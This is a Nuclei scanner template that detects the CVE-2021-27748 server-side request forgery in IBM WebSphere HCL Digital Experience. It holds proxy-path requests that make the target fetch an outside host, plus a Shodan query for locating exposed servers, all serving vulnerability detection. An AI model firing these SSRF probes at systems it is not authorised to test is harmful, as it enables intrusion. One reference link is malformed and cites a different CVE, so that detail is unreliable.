nuclei-templates/http/cves/2021/CVE-2021-27748.yaml

42 lines
1.2 KiB
YAML

id: CVE-2021-27748
info:
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
remediation: |
Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268
classification:
cve-id: CVE-2021-27748
metadata:
verified: true
max-request: 2
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2021,hcl,ibm,ssrf,websphere
http:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Interactsh Server"
- type: status
status:
- 200